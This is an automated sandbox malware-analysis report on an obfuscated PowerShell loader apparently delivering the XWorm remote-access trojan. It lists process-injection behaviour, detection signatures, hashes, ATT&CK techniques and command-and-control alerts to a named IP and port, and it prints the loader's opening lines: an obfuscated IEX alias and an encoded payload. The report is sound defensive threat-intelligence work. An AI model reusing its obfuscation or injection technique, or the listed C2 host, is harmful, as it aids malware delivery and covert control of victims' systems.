            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7235
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2585
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936 | Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908 | Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: RegSvcs.exe, 00000003.00000002.3880564789.00000000011F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FCB008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: RegSvcs.exe, 00000003.00000002.3883270268.0000000003085000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: RegSvcs.exe, 00000003.00000002.3883270268.0000000003085000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
            Source: RegSvcs.exe, 00000003.00000002.3883270268.0000000003085000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: RegSvcs.exe, 00000003.00000002.3883270268.0000000003085000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: RegSvcs.exe, 00000003.00000002.3883270268.0000000003085000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Managert-
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: RegSvcs.exe, 00000003.00000002.3880564789.00000000011EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7948, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7948, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic in the report's column order; leading numbers are kept as they appear in the report)

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services
Execution: 11 Windows Management Instrumentation | Scheduled Task/Job | At | Cron | Launchd | Scheduled Task | Systemd Timers
Persistence: 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items
Privilege Escalation: 212 Process Injection | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items
Defense Evasion: 1 Disable or Modify Tools | 121 Virtualization/Sandbox Evasion | 212 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Obfuscated Files or Information | 2 Software Packing | 1 DLL Side-Loading
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync
Discovery: 121 Security Software Discovery | 2 Process Discovery | 121 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 2 File and Directory Discovery | 13 System Information Discovery | Remote System Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management
Collection: 11 Archive Collected Data | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture
Command and Control: 1 Encrypted Channel | 1 Non-Standard Port | 1 Application Layer Protocol | Protocol Impersonation | Fallback Channels | Multiband Communication | Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery
Behavior Graph

Behavior Graph ID: 1601199
Sample: rZqmN4mRco.ps1
Start date: 28/01/2025
Architecture: WINDOWS
Score: 100

Start
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
  powershell.exe 19 (started)
    Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
    RegSvcs.exe 2 (started)
      DNS/IP: 176.113.115.225, 4444, 49705 SELECTELRU Russian Federation
      Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
    conhost.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
rZqmN4mRco.ps1 | 31% | Virustotal |
rZqmN4mRco.ps1 | 24% | ReversingLabs | Script-PowerShell.Downloader.Amadey
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
176.113.115.225 | 0% | Avira URL Cloud | safe


No contacted domains info

Contacted IPs
Name | Malicious | Antivirus Detection | Reputation
176.113.115.225 | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1462732194.0000019B1A8CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1441536967.0000019B0A681000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1441536967.0000019B0A681000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000001.00000002.1441536967.0000019B0AB0D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1462732194.0000019B1A8CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted Public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
176.113.115.225 | unknown | Russian Federation | 49505 | SELECTELRU | true
General Information

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1601199
Start date and time: 2025-01-28 12:22:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rZqmN4mRco.ps1 (renamed because original name is a hash value)
Original Sample Name: 802c0cc4f3d35ffedec258400ce9f0c4b2d884db30a974e0fd6b72ffdff73fed.ps1
Detection: MAL
Classification: mal100.troj.evad.winPS1@4/5@0/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 8
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .ps1
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegSvcs.exe, PID 7948 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7728 because it is empty
• Not all processes were analyzed; the report is missing behavior information
Time | Type | Description
06:23:09 | API Interceptor | 7x Sleep call for process: powershell.exe modified
06:23:12 | API Interceptor | 7994765x Sleep call for process: RegSvcs.exe modified
Joe Sandbox Context (IPs)
Match | Associated Sample Name / URL | Detection | Threat Name
176.113.115.225 | 011K3SJvSf.exe | malicious | XWorm
176.113.115.225 | uPt3XcHAIA.exe | malicious | XWorm
176.113.115.225 | qlGJTKUY7O.exe | malicious | XWorm
176.113.115.225 | 176.113.115_2.225.ps1 | malicious | XWorm

No context

Joe Sandbox Context (ASNs)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SELECTELRU | 011K3SJvSf.exe | malicious | XWorm | 176.113.115.225
SELECTELRU | uPt3XcHAIA.exe | malicious | XWorm | 176.113.115.225
SELECTELRU | qlGJTKUY7O.exe | malicious | XWorm | 176.113.115.225
SELECTELRU | 176.113.115_2.225.ps1 | malicious | XWorm | 176.113.115.225
SELECTELRU | p199AjsEFs.exe | malicious | Amadey, AsyncRAT, KeyLogger, LummaC Stealer, PureLog Stealer, ReverseShell, Stealc | 176.113.115.163
SELECTELRU | VbEfsnL4cp.exe | malicious | LummaC Stealer | 176.113.115.215
SELECTELRU | 2E02vIiMfd.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | 176.113.115.96
SELECTELRU | grcKLMutRS.exe | malicious | LummaC Stealer | 176.113.115.215
SELECTELRU | 4WzIkJRbcc.exe | malicious | LummaC Stealer | 176.113.115.215
SELECTELRU | 2r81fhbT6k.exe | malicious | LummaC Stealer | 176.113.115.215

No context
No context
Dropped Files

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulJnp/p:NllU
MD5: BC6DB77EB243BF62DC31267706650173
SHA1: 9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256: 5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512: 91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e.................................X..............@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6222
Entropy (8bit): 3.723276965105973
Encrypted: false
SSDEEP: 96:k4gVG0tyBCeAP8yJtkvhkvCCtZHPjQgxHLYPjQg+HL4:DgVG0tylAP1zZvjv6jS4
MD5: 6A14F41244D47214D6D5EF16C0E4BE4E
SHA1: 4A695D67142920F8E9D537737BF8F27BFEA40129
SHA-256: 3899B3340B3B8CA7784AB4D78C0B18E587DC3C5543B3E173AE256C0D701BCBB0
SHA-512: BFCACC5567C968A2674590E9FC14E9A5CF2C030C7E7A5AC1F9C550EDB3759D3C996C4AD8DACFEA4087BE8D50E37D277903C2B37FFFE4ADD43B5A5A2BEF123F01
Malicious: false
Preview: ...................................FL..................F.".. ......Yd....C..wq..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....O..vq......wq......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B<Z.Z..........................d...A.p.p.D.a.t.a...B.V.1.....<Z.Z..Roaming.@......EW)B<Z.Z..........................ch%.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B<Z.Z............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B<Z.Z.............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B<Z.Z....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B<Z.Z....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B<Z.Z.....0..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6222
Entropy (8bit): 3.723276965105973
Encrypted: false
SSDEEP: 96:k4gVG0tyBCeAP8yJtkvhkvCCtZHPjQgxHLYPjQg+HL4:DgVG0tylAP1zZvjv6jS4
MD5: 6A14F41244D47214D6D5EF16C0E4BE4E
SHA1: 4A695D67142920F8E9D537737BF8F27BFEA40129
SHA-256: 3899B3340B3B8CA7784AB4D78C0B18E587DC3C5543B3E173AE256C0D701BCBB0
SHA-512: BFCACC5567C968A2674590E9FC14E9A5CF2C030C7E7A5AC1F9C550EDB3759D3C996C4AD8DACFEA4087BE8D50E37D277903C2B37FFFE4ADD43B5A5A2BEF123F01
Malicious: false
Preview: ...................................FL..................F.".. ......Yd....C..wq..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....O..vq......wq......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B<Z.Z..........................d...A.p.p.D.a.t.a...B.V.1.....<Z.Z..Roaming.@......EW)B<Z.Z..........................ch%.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B<Z.Z............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B<Z.Z.............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B<Z.Z....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B<Z.Z....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B<Z.Z.....0..........
Static File Info

File type: ASCII text, with very long lines (65481), with CRLF line terminators
Entropy (8bit): 5.51329593911
TrID:
File name: rZqmN4mRco.ps1
File size: 162'316 bytes
MD5: c243c751841d3cce8b6d14ecd48703b7
SHA1: 145913260586b946f0e858635c6255b073531b71
SHA256: 802c0cc4f3d35ffedec258400ce9f0c4b2d884db30a974e0fd6b72ffdff73fed
SHA512: b129a633e5e0fa06f3d8d5228b367b2be4ea7983041622ac19d135fb3accd9720b5199fdf3172531e9928a5e05a342fae5ff4f6c0283d7bea95d02fd6b1bf317
SSDEEP: 3072:SB7VzghaUYePuBkEx9W2a4OlnlMDFQiPXqGlZPfOBAZR6Oc:SB5VePtS9W2a4OlnlMpTPXVWBAH6Oc
TLSH: B1F308318914BC5BCEEF2F8665102FD23C79253BCE651028F58F19B92E642349E7AF64
File Content Preview: .... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAKvny6YAAAAAAAAAA
Icon Hash: 3270d6baae77db44


Network Behavior: Suricata IDS Alerts

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-28T12:23:26.807778+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:23:27.023169+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:23:27.307565+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:23:35.884149+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:23:35.884149+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:23:39.893947+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:23:39.909678+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:23:52.769091+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:23:52.773427+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:05.664555+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:05.666581+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:05.886218+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:18.527432+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:18.529867+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:21.628137+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:21.634672+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:21.750649+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:21.758652+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:26.972360+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:26.976678+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:27.373556+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:27.375983+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
